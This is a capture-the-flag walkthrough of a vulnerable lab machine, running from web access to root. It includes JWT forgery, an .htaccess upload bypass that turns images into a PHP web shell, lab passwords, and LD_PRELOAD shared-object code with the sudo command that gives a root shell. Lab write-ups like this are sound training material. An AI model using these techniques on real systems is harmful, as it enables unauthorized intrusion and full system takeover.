Port Scanning#
Only ports 22 and 80 are open.
WEB#
The homepage is a purely static page, and hidden directories can be found by checking the comments.
The path obtained from base64 decoding is /74221
.
The login form has a weak password test:123456
, log in.
It prompts that there is no permission to upload files, and combined with the cookie field, it suggests forging a JWT for privilege escalation.
There are two vulnerabilities left here: you can use an empty key, or brute-force the key to be jwtsecret123
.
After successfully forging, checking the dashboard interface will reveal that our identity is admin.
Next, go to the file upload section, which only allows uploading files with jpg or png extensions.
After testing, it is found that .htaccess files can be uploaded, so upload it with the following content:
AddType application/x-httpd-php .jpg
At this point, uploading a jpg image backdoor will allow access to the web shell.
Post-Exploitation#
www-data to pentester#
Found two ciphertexts, which are hidden in:
/etc/passwd
/srv/...
The ciphertexts are as follows:
Itwasthebestoftimes!itwastheworstoftimes@itwastheageofwisdom#itwastheageoffoolishness$itwastheepochofbelief,itwastheepochofincredulity,&itwastheseasonofLight...
Iuwbtthfbetuoftimfs"iuwbsuhfxpsttoguinet@jtwbttieahfogwiseon#iuxatthfageofgpoljthoess%itwbsuiffqocipfbemieg-iuxbsuhffqpdhogjocredvljtz,'iuwasuhesfasooofLjgiu...
Upon careful observation, the difference between the two texts is represented by 1, while the similarities are represented by 0, allowing us to obtain a binary string, which can be converted to bytes to get the password.
Reference solution:
cat a.txt|sed 's/./&\n/g' >aa.txt
cat b.txt|sed 's/./&\n/g' >bb.txt
paste aa.txt bb.txt|awk '{if($1==$2){print 0}else{print 1}}'|xargs|tr -d ' '|fold -w8 | while read bin; do printf "%02X" "$((2#$bin))"; done | xxd -r -p
Obtained the pentester user's password Y0U_5M4SH3D_17_8UDDY
.
pentester to xiix#
Note that sudo find
is a rabbit hole, filtering out options that could lead to privilege escalation (of course, if you really escalate to root through this backdoor, you are impressive).
Checking the ports reveals that 8989 is open.
In fact, it corresponds to a Python script that triggers every minute.
Using nc 127.0.0.1 8989
and entering the password obtained above will give access to the xiix user's shell. Since it is not an interactive shell, you can write to the public key file for persistence.
xiix to root#
The guess_name
script guesses numbers, with a success probability of 1%. You can write a multithreaded script to brute-force it. There are two backdoors hidden here: using env
to view environment variables, inputting 1337 will allow you to pass;
Additionally, the script will write the password to a hidden file /tmp/.hidden_clue
during execution.
Running pspy -f
will detect it:
Anyway, obtained the xiix user's password superxiix
.
Then use sudo -l
, and find that there is env_keep+=LD_PRELOAD
.
This is a classic privilege escalation point.
First, compile shell.so
:
#include <stdio.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setuid(0);
setgid(0);
system("/bin/bash");
}
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
Then execute: sudo LD_PRELOAD=/home/xiix/shell.so whoami
, and you will obtain a root shell.